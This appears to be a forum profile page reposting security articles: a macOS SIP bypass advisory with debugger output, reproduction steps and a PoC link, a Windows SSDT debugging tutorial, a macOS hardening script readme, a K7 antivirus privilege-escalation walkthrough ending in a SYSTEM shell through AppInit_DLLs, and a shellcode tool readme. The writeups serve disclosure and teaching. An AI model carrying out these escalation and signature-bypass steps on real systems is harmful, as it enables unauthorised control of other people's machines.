Everything posted by Nytro
-
Tested on macOS Mojave (10.14.6, 18G87) and Catalina Beta (10.15 Beta 19A536g).

On macOS, the dyld shared cache (in /private/var/db/dyld/) is generated locally on the system and therefore doesn't have a real code signature; instead, SIP seems to be the only mechanism that prevents modifications of the dyld shared cache. update_dyld_shared_cache, the tool responsible for generating the shared cache, is able to write to /private/var/db/dyld/ because it has the com.apple.rootless.storage.dyld entitlement. Therefore, update_dyld_shared_cache is responsible for ensuring that it only writes data from trustworthy libraries when updating the shared cache.

update_dyld_shared_cache accepts two interesting command-line arguments that make it difficult to enforce these security properties:

- "-root": Causes libraries to be read from, and the cache to be written to, a caller-specified filesystem location.
- "-overlay": Causes libraries to be read from a caller-specified filesystem location before falling back to normal system directories.

There are some checks related to this, but they don't look very effective. main() tries to see whether the target directory is protected by SIP:

    bool requireDylibsBeRootlessProtected = isProtectedBySIP(cacheDir);

If that variable is true, update_dyld_shared_cache attempts to ensure that all source libraries are also protected by SIP. isProtectedBySIP() is implemented as follows:

    bool isProtectedBySIP(const std::string& path)
    {
        if ( !sipIsEnabled() )
            return false;
        return (rootless_check_trusted(path.c_str()) == 0);
    }

Ignoring that this looks like a typical symlink race issue, there's another problem: Looking in a debugger (with SIP configured so that only debugging restrictions and dtrace restrictions are disabled), it seems like rootless_check_trusted() doesn't work as expected:

    bash-3.2# lldb /usr/bin/update_dyld_shared_cache
    [...]
    (lldb) breakpoint set --name isProtectedBySIP(std::__1::basic_string<char,\ std::__1::char_traits<char>,\ std::__1::allocator<char>\ >\ const&)
    Breakpoint 1: where = update_dyld_shared_cache`isProtectedBySIP(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&), address = 0x00000001000433a4
    [...]
    (lldb) run -force
    Process 457 launched: '/usr/bin/update_dyld_shared_cache' (x86_64)
    Process 457 stopped
    * thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
        frame #0: 0x00000001000433a4 update_dyld_shared_cache`isProtectedBySIP(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&)
    update_dyld_shared_cache`isProtectedBySIP:
    ->  0x1000433a4 <+0>: pushq  %rbp
        0x1000433a5 <+1>: movq   %rsp, %rbp
        0x1000433a8 <+4>: pushq  %rbx
        0x1000433a9 <+5>: pushq  %rax
    Target 0: (update_dyld_shared_cache) stopped.
    (lldb) breakpoint set --name rootless_check_trusted
    Breakpoint 2: where = libsystem_sandbox.dylib`rootless_check_trusted, address = 0x00007fff5f32b8ea
    (lldb) continue
    Process 457 resuming
    Process 457 stopped
    * thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 2.1
        frame #0: 0x00007fff5f32b8ea libsystem_sandbox.dylib`rootless_check_trusted
    libsystem_sandbox.dylib`rootless_check_trusted:
    ->  0x7fff5f32b8ea <+0>: pushq  %rbp
        0x7fff5f32b8eb <+1>: movq   %rsp, %rbp
        0x7fff5f32b8ee <+4>: movl   $0xffffffff, %esi ; imm = 0xFFFFFFFF
        0x7fff5f32b8f3 <+9>: xorl   %edx, %edx
    Target 0: (update_dyld_shared_cache) stopped.
    (lldb) print (char*)$rdi
    (char *) $0 = 0x00007ffeefbff171 "/private/var/db/dyld/"
    (lldb) finish
    Process 457 stopped
    * thread #1, queue = 'com.apple.main-thread', stop reason = step out
        frame #0: 0x00000001000433da update_dyld_shared_cache`isProtectedBySIP(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&) + 54
    update_dyld_shared_cache`isProtectedBySIP:
    ->  0x1000433da <+54>: testl  %eax, %eax
        0x1000433dc <+56>: sete   %al
        0x1000433df <+59>: addq   $0x8, %rsp
        0x1000433e3 <+63>: popq   %rbx
    Target 0: (update_dyld_shared_cache) stopped.
    (lldb) print $rax
    (unsigned long) $1 = 1

Looking around with a little helper (under the assumption that it doesn't behave differently because it doesn't have the entitlement), it looks like only a small part of the SIP-protected directories show up as protected when you check with rootless_check_trusted():

    bash-3.2# cat rootless_test.c
    #include <stdio.h>

    int rootless_check_trusted(char *);

    int main(int argc, char **argv) {
      int res = rootless_check_trusted(argv[1]);
      printf("rootless status for '%s': %d (%s)\n",
             argv[1], res, (res == 0) ? "PROTECTED" : "MALLEABLE");
    }
    bash-3.2# ./rootless_test /
    rootless status for '/': 1 (MALLEABLE)
    bash-3.2# ./rootless_test /System
    rootless status for '/System': 0 (PROTECTED)
    bash-3.2# ./rootless_test /System/
    rootless status for '/System/': 0 (PROTECTED)
    bash-3.2# ./rootless_test /System/Library
    rootless status for '/System/Library': 0 (PROTECTED)
    bash-3.2# ./rootless_test /System/Library/Assets
    rootless status for '/System/Library/Assets': 1 (MALLEABLE)
    bash-3.2# ./rootless_test /System/Library/Caches
    rootless status for '/System/Library/Caches': 1 (MALLEABLE)
    bash-3.2# ./rootless_test /System/Library/Caches/com.apple.kext.caches
    rootless status for '/System/Library/Caches/com.apple.kext.caches': 1 (MALLEABLE)
    bash-3.2# ./rootless_test /usr
    rootless status for '/usr': 0 (PROTECTED)
    bash-3.2# ./rootless_test /usr/local
    rootless status for '/usr/local': 1 (MALLEABLE)
    bash-3.2# ./rootless_test /private
    rootless status for '/private': 1 (MALLEABLE)
    bash-3.2# ./rootless_test /private/var/db
    rootless status for '/private/var/db': 1 (MALLEABLE)
    bash-3.2# ./rootless_test /private/var/db/dyld/
    rootless status for '/private/var/db/dyld/': 1 (MALLEABLE)
    bash-3.2# ./rootless_test /sbin
    rootless status for '/sbin': 0 (PROTECTED)
    bash-3.2# ./rootless_test /Applications/Mail.app/
    rootless status for '/Applications/Mail.app/': 0 (PROTECTED)
    bash-3.2#

Perhaps rootless_check_trusted() limits its trust to paths that are writable exclusively using installer entitlements like com.apple.rootless.install, or something like that? That's the impression I get when testing different entries from /System/Library/Sandbox/rootless.conf - the entries with no whitelisted specific entitlement show up as protected, the ones with a whitelisted specific entitlement show up as malleable. rootless_check_trusted() checks for the "file-write-data" permission through the MAC syscall, but I haven't looked in detail at how the policy actually looks.
(By the way, looking at update_dyld_shared_cache, I'm not sure whether it would actually work if the requireDylibsBeRootlessProtected flag is true - it looks like addIfMachO() would never add any libraries to dylibsForCache because `sipProtected` is fixed to `false` and the call to isProtectedBySIP() is commented out?)

In theory, this means it's possible to inject a modified version of a library into the dyld cache using either the -root or the -overlay flag of update_dyld_shared_cache, reboot, and then run an entitled binary that will use the modified library. However, there are (non-security) checks that make this annoying:

- When loading libraries, loadPhase5load() checks whether the st_ino and st_mtime of the on-disk library match the ones embedded in the dyld cache at build time.
- Recently, dyld started ensuring that the libraries are all on the "boot volume" (the path specified with "-root", or "/" if no root was specified).

The inode number check means that it isn't possible to just create a malicious copy of a system library, run `update_dyld_shared_cache -overlay`, and reboot to use the malicious copy; the modified library will have a different inode number. I don't know whether HFS+ reuses inode numbers over time, but on APFS, not even that is possible; inode numbers are monotonically incrementing 64-bit integers.

Since root (and even normal users) can mount filesystem images, I decided to create a new filesystem with appropriate inode numbers. I think HFS probably can't represent the full range of inode numbers that APFS can have (and that seem to show up on volumes that have been converted from HFS+ - that seems to result in inode numbers like 0x0fffffff00001666), so I decided to go with an APFS image.
Writing code to craft an entire APFS filesystem would probably take quite some time, and the public open-source APFS implementations seem to be read-only, so I'm first assembling a filesystem image normally (create filesystem with newfs_apfs, mount it, copy files in, unmount), then renumbering the inodes. By storing files in the right order, I don't even need to worry about allocating and deallocating space in tree nodes and such - all replacements can be performed in-place.

My PoC patches the cached version of csr_check() from libsystem_kernel.dylib so that it always returns zero, which causes the userspace kext loading code to ignore code signing errors. To reproduce:

- Ensure that SIP is on.
- Ensure that you have at least something like 8GiB of free disk space.
- Unpack the attached dyld_sip.tar (as normal user).
- Run ./collect.sh (as normal user). This should take a couple minutes, with more or less continuous status updates. At the end, it should say "READY" after mounting an image to /private/tmp/L. (If something goes wrong here and you want to re-run the script, make sure to detach the volume if the script left it attached - check "hdiutil info".)
- As root, run "update_dyld_shared_cache -force -root /tmp/L".
- Reboot the machine.
- Build an (unsigned) kext from source. I have attached source code for a sample kext as testkext.tar - you can unpack it and use xcodebuild -, but that's just a simple "hello world" kext, you could also use anything else.
- As root, copy the kext to /tmp/.
- As root, run "kextutil /tmp/[...].kext".
You should see something like this:

    bash-3.2# cp -R testkext/build/Release/testkext.kext /tmp/ && kextutil /tmp/testkext.kext
    Kext with invalid signatured (-67050) allowed: <OSKext 0x7fd10f40c6a0 [0x7fffa68438e0]> { URL = "file:///private/tmp/testkext.kext/", ID = "net.thejh.test.testkext" }
    Code Signing Failure: code signature is invalid
    Disabling KextAudit: SIP is off
    Invalid signature -67050 for kext <OSKext 0x7fd10f40c6a0 [0x7fffa68438e0]> { URL = "file:///private/tmp/testkext.kext/", ID = "net.thejh.test.testkext" }
    bash-3.2# dmesg|tail -n1
    test kext loaded
    bash-3.2# kextstat | grep test
      120    0 0xffffff7f82a50000 0x2000 0x2000 net.thejh.test.testkext (1) A24473CD-6525-304A-B4AD-B293016E5FF0 <5>
    bash-3.2#

Miscellaneous notes:

- It looks like there's an OOB kernel write in the dyld shared cache pager; but AFAICS that isn't reachable unless you've already defeated SIP, so I don't think it's a vulnerability: vm_shared_region_slide_page_v3() is used when a page from the dyld cache is being paged in. It essentially traverses a singly-linked list of relocations inside the page; the offset of the first relocation (iow the offset of the list head) is stored permanently in kernel memory when the shared cache is initialized. As far as I can tell, this function is missing bounds checks; if either the starting offset or the offset stored in the page being paged in points outside the page, a relocation entry will be read from OOB memory, and a relocated address will conditionally be written back to the same address.
- There is a check `rootPath != "/"` in update_dyld_shared_cache; but further up is this:

        // canonicalize rootPath
        if ( !rootPath.empty() ) {
            char resolvedPath[PATH_MAX];
            if ( realpath(rootPath.c_str(), resolvedPath) != NULL ) {
                rootPath = resolvedPath;
            }
            // <rdar://problem/33223984> when building closures for boot volume, pathPrefixes should be empty
            if ( rootPath == "/" ) {
                rootPath = "";
            }
        }

  So as far as I can tell, that condition is always true, which means that when an overlay path is specified with `-overlay`, the cache is written to the root even though the code looks as if the cache is intended to be written to the overlay.

- Some small notes regarding the APFS documentation at <https://developer.apple.com/support/downloads/Apple-File-System-Reference.pdf>:
  - The typedef for apfs_superblock_t is missing.
  - The documentation claims that APFS_TYPE_DIR_REC keys are j_drec_key_t, but actually they can be j_drec_hashed_key_t.
  - The documentation claims that o_cksum is "The Fletcher 64 checksum of the object", but actually APFS requires that the fletcher64 checksum of all data behind the checksum concatenated with the checksum is zero. (In other words, you cut out the checksum field at the start, append it at the end, then run fletcher64 over the buffer, and then you have to get an all-zeroes checksum.)

Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47708.zip

Sursa: https://www.exploit-db.com/exploits/47708
-
A Glimpse into SSDT inside Windows x64 Kernel

What is SSDT

System Service Dispatch Table, or SSDT, is simply an array of addresses to kernel routines for 32-bit operating systems, or an array of relative offsets to the same routines for 64-bit operating systems. SSDT is the first member of the Service Descriptor Table kernel memory structure as shown below:

    typedef struct tagSERVICE_DESCRIPTOR_TABLE {
        SYSTEM_SERVICE_TABLE nt;     // effectively a pointer to Service Dispatch Table (SSDT) itself
        SYSTEM_SERVICE_TABLE win32k;
        SYSTEM_SERVICE_TABLE sst3;   // pointer to a memory address that contains how many routines are defined in the table
        SYSTEM_SERVICE_TABLE sst4;
    } SERVICE_DESCRIPTOR_TABLE;

SSDTs used to be hooked by AVs as well as rootkits that wanted to hide files, registry keys, network connections, etc. Microsoft introduced PatchGuard for x64 systems to fight SSDT modifications by BSOD'ing the system.

In Human Terms

When a program in user space calls a function, say CreateFile, eventually code execution is transferred to ntdll!NtCreateFile and via a syscall to the kernel routine nt!NtCreateFile. A syscall is merely an index into the System Service Dispatch Table (SSDT), which contains an array of pointers for 32-bit OSes (or relative offsets to the Service Dispatch Table for 64-bit OSes) to all critical system APIs like ZwCreateFile, ZwOpenFile and so on. Below is a simplified diagram that shows how offsets in the SSDT KiServiceTable are converted to absolute addresses of corresponding kernel routines:

Effectively, syscalls and the SSDT (KiServiceTable) work together as a bridge between userland API calls and their corresponding kernel routines, allowing the kernel to know which routine should be executed for a given syscall that originated in user space.

Service Descriptor Table

In WinDBG, we can check the Service Descriptor Table structure KeServiceDescriptorTable as shown below.
Note that the first member is recognized as KiServiceTable - this is a pointer to the SSDT itself - the dispatch table (or simply an array) containing all those pointers/offsets:

    0: kd> dps nt!keservicedescriptortable L4
    fffff801`9210b880  fffff801`9203b470 nt!KiServiceTable
    fffff801`9210b888  00000000`00000000
    fffff801`9210b890  00000000`000001ce
    fffff801`9210b898  fffff801`9203bbac nt!KiArgumentTable

Let's try and print out a couple of values from the SSDT:

    0: kd> dd /c1 KiServiceTable L2
    fffff801`9203b470  fd9007c4
    fffff801`9203b474  fcb485c0

As mentioned earlier, on x64, which is what I'm running in my lab, the SSDT contains relative offsets to kernel routines. In order to get the absolute address for a given offset, the following formula needs to be applied:

    RoutineAbsoluteAddress = KiServiceTableAddress + (routineOffset >>> 4)

Using the above formula and the first offset fd9007c4 we got from the KiServiceTable, we can work out that this offset is pointing to nt!NtAccessCheck:

    0: kd> u KiServiceTable + (0xfd9007c4 >>> 4)
    nt!NtAccessCheck:
    fffff801`91dcb4ec 4c8bdc           mov  r11,rsp
    fffff801`91dcb4ef 4883ec68         sub  rsp,68h
    fffff801`91dcb4f3 488b8424a8000000 mov  rax,qword ptr [rsp+0A8h]
    fffff801`91dcb4fb 4533d2           xor  r10d,r10d

We can confirm it if we try to disassemble nt!NtAccessCheck - the routine address (fffff801`91dcb4ec) and first instruction (mov r11, rsp) of the above and below commands match:

    0: kd> u nt!NtAccessCheck L1
    nt!NtAccessCheck:
    fffff801`91dcb4ec 4c8bdc           mov  r11,rsp

If we refer back to the original drawing on how SSDT offsets are converted to absolute addresses, we can redraw it with specific values for syscall 0x1:

Finding a Dispatch Routine for a Given Userland Syscall

As a simple exercise, given a known syscall number, we can try to work out what kernel routine will be called once that syscall is issued.
Let's load the debugging symbols for the ntdll module:

    .reload /f ntdll.dll
    lm ntdll

Let's now find the syscall for ntdll!NtCreateFile:

    0: kd> u ntdll!ntcreatefile L2

...we can see the syscall is 0x55.

Offsets in the KiServiceTable are 4 bytes in size, so we can work out the offset for syscall 0x55 by looking into the value the KiServiceTable holds at position 0x55:

    0: kd> dd /c1 kiservicetable+4*0x55 L1
    fffff801`9203b5c4  01fa3007

We see from the above that the offset for NtCreateFile is 01fa3007. Using the formula discussed previously for working out the absolute routine address, we confirm that we're looking at the nt!NtCreateFile kernel routine that will be called once ntdll!NtCreateFile issues the 0x55 syscall:

    0: kd> u kiservicetable + (01fa3007>>>4) L1
    nt!NtCreateFile:
    fffff801`92235770 4881ec88000000   sub  rsp,88h

Let's redraw the earlier diagram once more for the syscall 0x55 for ntdll!NtCreateFile:

Finding Address of All SSDT Routines

As another exercise, we could loop through all items in the service dispatch table and print absolute addresses for all routines defined in the dispatch table:

    .foreach /ps 1 /pS 1 ( offset {dd /c 1 nt!KiServiceTable L poi(keservicedescriptortable+0x10) }){ dp kiservicetable + ( offset >>> 4 ) L1 }

Nice, but not very human readable.
We can update the loop a bit and print out the API names associated with those absolute addresses:

    0: kd> .foreach /ps 1 /pS 1 ( offset {dd /c 1 nt!KiServiceTable L poi(nt!KeServiceDescriptorTable+10)}){ r $t0 = ( offset >>> 4) + nt!KiServiceTable; .printf "%p - %y\n", $t0, $t0 }
    fffff80191dcb4ec - nt!NtAccessCheck (fffff801`91dcb4ec)
    fffff80191cefccc - nt!NtWorkerFactoryWorkerReady (fffff801`91cefccc)
    fffff8019218df1c - nt!NtAcceptConnectPort (fffff801`9218df1c)
    fffff801923f8848 - nt!NtMapUserPhysicalPagesScatter (fffff801`923f8848)
    fffff801921afc10 - nt!NtWaitForSingleObject (fffff801`921afc10)
    fffff80191e54010 - nt!NtCallbackReturn (fffff801`91e54010)
    fffff8019213cf60 - nt!NtReadFile (fffff801`9213cf60)
    fffff801921b2e80 - nt!NtDeviceIoControlFile (fffff801`921b2e80)
    fffff80192212dc0 - nt!NtWriteFile (fffff801`92212dc0)
    .....cut for brevity.....

References

- The Quest for the SSDTs (codeproject.com)
- .printf - Windows drivers (docs.microsoft.com)
- .foreach - Windows drivers (docs.microsoft.com)

Sursa: https://ired.team/miscellaneous-reversing-forensics/windows-kernel/glimpse-into-ssdt-in-windows-x64-kernel
-
macOS Lockdown (mOSL)

Bash script to audit and fix macOS Catalina (10.15.x) security settings

Inspired by and based on Lockdown by Patrick Wardle and osxlockdown by Scott Piper.

Warnings

- mOSL is being rewritten in Swift and the Bash version will be deprecated. See: "The Future of mOSL".
- Always run the latest release, not the code in master!
- This script will only ever support the latest macOS release.
- This script requires your password to invoke some commands with sudo.

brew tap: 0xmachos/homebrew-mosl

To install mOSL via brew execute:

    brew tap 0xmachos/homebrew-mosl
    brew install mosl

mOSL will then be available as: Lockdown

Threat Model(ish)

The main goal is to enforce already secure defaults and apply more strict non-default options. It aims to reduce attack surface but it is pragmatic in this pursuit. The author utilises Bluetooth for services such as Handoff, so it is left enabled. There is no specific focus on enhancing privacy. Finally, mOSL will not protect you from the FSB, MSS, DGSE, or FSM.

Full Disk Access Permission

In macOS Mojave and later certain application data is protected by the OS. For example, if Example.app wishes to access Contacts.app data, Example.app must be given explicit permission via System Preferences > Security & Privacy > Privacy. However some application data cannot be accessed via a specific permission. Access to this data requires the Full Disk Access permission.

mOSL requires that Terminal.app be given the Full Disk Access permission. It needs this permission to audit/fix the following settings:

- disable mail remote content
- disable auto open safe downloads

These are currently the only settings which require Full Disk Access. It is not possible to programmatically get or prompt for this permission; it must be manually given by the user.
To give Terminal.app Full Disk Access: System Preferences > Security & Privacy > Privacy > Full Disk Access > Add Terminal.app

Once you are done with mOSL you can revoke Full Disk Access for Terminal.app. There's a small checkbox next to Terminal which you can uncheck to revoke the permission without entirely removing Terminal.app from the list.

More info on macOS's new permission model:

- Working with Mojave's Privacy Protection by Howard Oakley
- TCC Round Up by Carl Ashley
- WWDC 2018 Session 702: Your Apps and the Future of macOS Security

Verification

The executable Lockdown file can be verified with Minisign:

    minisign -Vm Lockdown -P RWTiYbJbLl7q6uQ70l1XCvGExizUgEBNDPH0m/1yMimcsfgh542+RDPU

Install via brew:

    brew install minisign

Usage

    $ ./Lockdown
    Audit or Fix macOS security settings?

    Usage: ./Lockdown [list | audit {setting_index} | fix {setting_index} | debug]

      list       - List settings that can be audited/fixed
      audit      - Audit the status of all or chosen setting(s) (Does NOT change settings)
      fix        - Attempt to fix all or chosen setting(s) (Does change settings)
      fix-force  - Same as 'fix' however bypasses user confirmation prompt
                   (Can be used to invoke Lockdown from other scripts)
      debug      - Print debug info for troubleshooting

Settings

See Commands.md for an easy to read list of commands used to audit/fix the below settings.
Settings that can be audited/fixed:

    [0]  enable automatic system updates
    [1]  enable automatic app store updates
    [2]  enable gatekeeper
    [3]  enable firewall
    [4]  enable admin password preferences
    [5]  enable terminal secure entry
    [6]  enable sip
    [7]  enable filevault
    [8]  disable firewall builtin software
    [9]  disable firewall downloaded signed
    [10] disable ipv6
    [11] disable mail remote content
    [12] disable remote apple events
    [13] disable remote login
    [14] disable auto open safe downloads
    [15] set airdrop contacts only
    [16] set appstore update check daily
    [17] set firmware password
    [18] check kext loading consent
    [19] check efi integrity
    [20] check if standard user

Sursa: https://github.com/0xmachos/mOSL
-
Anti-virus Exploitation: Local Privilege Escalation in K7 Security (CVE-2019-16897)

Posted Nov 24 by dtm

Anti-virus Exploitation

Hey guys, long time no article! Over the past few months, I have been looking into exploitation of anti-viruses via logic bugs. I will briefly discuss the approach towards performing vulnerability research of these security products using the vulnerability I discovered in K7 Security as an example.

Disclaimer: I do not claim to know everything about vulnerability research nor exploitation, so if there are errors in this article, please let me know.

Target Selection

Security products such as anti-viruses are an attractive target (at least for me) because they operate in a trusted and privileged context in both the kernel, as a driver, and userland, as a privileged service. This means that they have the ability to facilitate potential escalation of privilege or otherwise access privileged functionality. They also have a presence in the low-privileged space of the operating system. For example, there may exist a UI component with which the user can interact, sometimes allowing options to be changed such as enabling/disabling anti-virus, adding directory or file exclusions, and scanning files for malware. Anti-viruses must also access and perform operations on operating system objects to detect malware, such as reading files, registry keys, memory, etc., as well as being able to do privileged actions to keep the system in a protected state no matter the situation. It is between this trusted, high-privilege space and the untrusted, low-privilege space where interesting things occur.

Attack Surface

As aforementioned, anti-viruses live on both sides of the privilege boundary as shown in the following diagram:

[Image: privilege boundary diagram]

Whatever crosses the line between high and low privilege represents the attack surface.
Let's look at how this diagram can be interpreted. The user interface shares common operations with the service process, which is expected. If the user wants to carry out a privileged action, the service will do it on their behalf, assuming that security checks are passed. If the user wishes to change a setting, they open the user interface and click a button. This is communicated to the service process via some form of inter-process communication (IPC), which will perform the necessary actions, e.g. the anti-virus stores its configuration in the registry and therefore the service will open the relevant registry key and modify some data. Keep in mind that the registry key is stored in the HKEY_LOCAL_MACHINE hive, which is in high-privilege space, thus requiring a high-privilege process to modify its data. So the user, from low privilege, is able to indirectly modify a high-privilege object.

One more example. A user can scan for malware through the user interface (of course, what good is an anti-virus if they disallow the user from scanning for malware?). A simple, benign operation, what could go wrong? Since it is the responsibility of the service process to perform the malware scan, the interface communicates the information to the service process to target a file. It must interact with the file in order to perform the scan, i.e. it must locate the file on disk and read its content. If, while the file data has been read and is being scanned for malware, the anti-virus does not lock the file on disk, it is possible for the malware to be replaced with a symbolic link pointing to a file in a high-privileged directory (yes, it is possible), let's use notepad.exe. When the scan is completed and the file has been determined to be malware, the service process can delete the file. However, the malware has been replaced with a link to notepad.exe! If the anti-virus does not detect and reject the symbolic link, it will delete notepad.exe without question.
This is an example of a Time of Check to Time of Use (TOCTOU) race condition bug. Again, the user, from low privilege, is able to indirectly modify a high-privilege object because of the service process acting as a broker.

Exploitation

This vulnerability allows a low-privilege user to modify (almost) arbitrary registry data through the anti-virus's settings. However, a low-privileged user (non-administrator) should not be able to change the anti-virus's settings.

Bypassing Administrative Checks

To narrow down how this administration check is performed, procmon can be used to identify operating system activity as the settings page is accessed again. This will trigger the anti-virus to recheck the administrative status of the current user while it interacts with the operating system as it is being logged. Of course, since we are low privilege and procmon requires high privilege, it is not practical in a real environment. However, because we control the testing environment, we can allow procmon to run as we have access to an administrator account. Setting procmon to filter by K7TSMain as the process name will capture activity performed by the user interface process. When procmon starts to log, attempting to access the settings page again in the UI will trigger procmon to instantly show results:

[Image: procmon admin check]

It can be seen that the anti-virus stores the administrative check in the registry in AdminNonAdminIsValid. Looking at the value in the Event Properties window shows that it returned 0, meaning that non-administrator users are not allowed. But there is a slight problem here. Bonus points if you can spot it.

Now that we know where the check is being performed, the next step is bypassing it. procmon shows that the process is running in low-privilege space, as indicated by the user and the medium integrity level, meaning that we own the process. If it is not protected, we can simply hook the RegQueryValue function and modify the return value.
[Image: Attaching to K7TSMain]

Attempting to attach to the K7TSMain.exe process using x32dbg is allowed! The breakpoint on RegQueryValueExA has been set for when we try to access the settings page again.

[Image: Triggering RegQueryValueExA breakpoint]

x32dbg catches the breakpoint when the settings page is clicked. The value name being queried is ProductType but we want AdminNonAdminIsValid, so continuing on will trigger the next breakpoint:

[Image: Breakpoint on AdminNonAdminIsValid]

Now we can see AdminNonAdminIsValid. To modify the return value, we can allow the function to run until return. However, the calling function looks like a wrapper for RegQueryValueExA, so continuing again until return reveals the culprit function that performs the check:

[Image: Admin check function]

There is an obvious check there for the value 1; however, the current returned value for the registry data is 0. This decides the return value of this function, so we can either change [esp+4] or change the return value to bypass the check:

[Image: Bypass admin check]

Intercepting Inter-process Communication

Multiple inter-process communication methods are available on Windows such as mailslots, file mapping, COM, and named pipes. We must figure out which is implemented in the product to be able to analyse the protocol. An easy way to do this is by using API Monitor to log select function calls made by the process. When we do this and then apply a changed setting, we can see references to named pipe functions:

[Image: API Monitor showing named pipe calls]

Note that the calling module is K7AVOptn.dll instead of K7TSMain.exe. If we have a look at the data being communicated through TransactNamedPipe, we can see some interesting information:

[Image: TransactNamedPipe buffer contents]

The first thing that pops out is that it looks like a list of extension names (.ocx, .exe, .com) separated with | where some have wildcard matching.
This could be a list of extensions to scan for malware. If we have a look at the registry where the anti-virus stores its configuration, we can see something similar under the value ScanExtensions in the RTFileScanner key:

[Image: ScanExtensions registry value]

Continuing down the list of calls, one of them contains some very intriguing data:

[Image: registry key paths in the pipe data]

It looks as though the anti-virus is applying values by specifying (privileged) registry keys and their values by their full key path. The next obvious step is to see if changing one of the keys and their values will work. This can be done by breakpointing on the TransactNamedPipe function in x32dbg:

[Image: breakpoint on TransactNamedPipe]

Once here, locate the input buffer in the second argument and alter the data to add or change a key in the HKEY_LOCAL_MACHINE hive like so:

[Image: altered input buffer]

If it is possible to change this registry key's values, high-privileged processes will be forced to load the DLLs listed in AppInit_DLLs, i.e. one that we control. The LoadAppInit_DLLs value must also be set to 1 (it is 0 by default) to enable this functionality. The result:

[Image: AppInit_DLLs values successfully written]

Triggering the Payload

You may have noticed that the registry key resides within Wow6432Node, which is the 32-bit counterpart of the registry. This is because the product is 32-bit and so Windows will automatically redirect registry changes. In 64-bit Windows, processes are usually 64-bit and so the chances of loading the payload DLL through AppInit_DLLs are slim. A reliable way is to make use of the anti-virus itself, because it is 32-bit, assuming a privileged component can be launched. The easiest way to do this is to restart the machine, because it will reload all of the anti-virus's processes; however, it is not always practical nor is it clean.
Clicking around the UI reveals that the update function runs K7TSHlpr.exe under the NT AUTHORITY\SYSTEM user: [Screenshot: K7TSHlpr.exe running as SYSTEM] As it is a 32-bit application, Windows will load our AppInit_DLLs DLL into its process space. [Screenshot: payload DLL loaded] Using system("cmd") as the payload will prompt the user with an interactive session in the context of the NT AUTHORITY\SYSTEM account via the UI0Detect service. Selecting to view the message brings up the following: [Screenshot: interactive SYSTEM shell] We have root!

Automated Exploit

Link to my GitHub for the advisory and an automated exploit.

Sursa: https://0x00sec.org/t/anti-virus-exploitation-local-privilege-escalation-in-k7-security-cve-2019-16897/17655
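To make the AppInit_DLLs trick above concrete, here is a sketch of the registry state the privileged component is tricked into writing. The key path and value names come from the writeup; the flat "key=value" framing of the pipe message is a hypothetical stand-in, since the real K7 pipe protocol is proprietary:

```python
# Sketch only: registry state forced through the K7 settings pipe.
# Key path and value names are from the writeup; the serialization
# format of the TransactNamedPipe buffer is a hypothetical stand-in.

APPINIT_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node"
               r"\Microsoft\Windows NT\CurrentVersion\Windows")

def craft_settings(dll_path):
    """Key/value pairs the privileged component is tricked into writing."""
    return {
        (APPINIT_KEY, "AppInit_DLLs"): dll_path,  # DLL loaded into 32-bit GUI processes
        (APPINIT_KEY, "LoadAppInit_DLLs"): "1",   # 0 by default; 1 enables the mechanism
    }

def serialize(settings):
    """Hypothetical '|'-separated framing, mimicking the observed buffer."""
    return "|".join(rf"{key}\{name}={value}"
                    for (key, name), value in settings.items())

print(serialize(craft_settings(r"C:\payload.dll")))
```

In a real run, this string would replace part of the buffer passed as the second argument to TransactNamedPipe, as shown in the x32dbg screenshots.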
-
Sickle

Sickle is a payload development tool originally created to aid me in crafting shellcode; however, it can be used in crafting payloads for other exploit types as well (non-binary). Although the current modules are mostly aimed at assembly, this tool is not limited to shellcode. Sickle can aid in the following:

Identifying instructions that result in bad characters when crafting shellcode
Formatting output in various languages (python, perl, javascript, etc.)
Accepting bytecode via STDIN and formatting it
Executing shellcode in both Windows and Linux environments
Diffing two binaries (hexdump, raw, asm, byte)
Disassembling shellcode into assembly language (ARM, x86, etc.)
Shellcode extraction from raw bins (nasm sc.asm -o sc)

Quick failure check

A task I found myself doing repetitively was compiling assembler source code, extracting the shellcode, placing it into a wrapper, and testing it. If it was a bad run, the process would be repeated until successful. Sickle takes care of placing the shellcode into a wrapper for quick testing (works on Windows and Unix systems).

Recreating shellcode

Sometimes you find a piece of shellcode that's fluent in its execution and you want to recreate it yourself to understand its underlying mechanisms. Sickle can help you compare the original shellcode to your "recreated" version. If you're not crafting shellcode and just need two binfiles to be the same, this feature can also help verify that the files match byte by byte (multiple modes).

Disassembly

Sickle can also take a binary file and convert the extracted opcodes (shellcode) to machine instructions. Keep in mind this works with raw opcodes (-r) and STDIN (-r -) as well. In the following example I am converting a reverse shell designed by Stephen Fewer to assembly.

Bad character identification

Module Based Design

This tool was originally designed as one big script; however, recently, when a change needed to be made, I had to relearn my own code...
In order to avoid this in the future I've decided to keep all modules under the "modules" directory (default module: format). If you prefer the old design, I have kept a copy under the Documentation directory.

~# sickle.py -l

  Name            Description
  ----            -----------
  diff            Compare two binaries / shellcode(s). Supports hexdump, byte, raw, and asm modes
  run             Execute shellcode on either windows or unix
  format          Format bytecode into desired format / language
  badchar         Generate bad characters in respective format
  disassemble     Disassemble bytecode in respective architecture
  pinpoint        Pinpoint where in shellcode bad characters occur

~# sickle -i -m diff

  Options for diff

  Name      Required    Description
  ----      --------    -----------
  BINFILE   yes         Additional binary file needed to perform diff
  MODE      yes         hexdump, byte, raw, or asm

  Description:
  Compare two binaries / shellcode(s). Supports hexdump, byte, raw, and asm modes

Sursa: https://github.com/wetw0rk/Sickle
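The bad-character identification feature advertised above boils down to a byte-for-byte diff between the shellcode you sent and the bytes that actually landed in the target process. This is not Sickle's own code, just a minimal sketch of the idea:

```python
# Sketch of the idea behind bad-character identification: diff the payload
# you sent against the bytes recovered from the target process.

def find_badchars(sent: bytes, landed: bytes):
    """Return (offset, sent_byte, landed_byte) for each mangled position."""
    return [
        (i, f"{a:#04x}", f"{b:#04x}")
        for i, (a, b) in enumerate(zip(sent, landed))
        if a != b
    ]

# Example: a filter turned 0x00 into 0x20 and 0x0a into 0x0d.
sent   = bytes([0x31, 0xc0, 0x00, 0x50, 0x0a])
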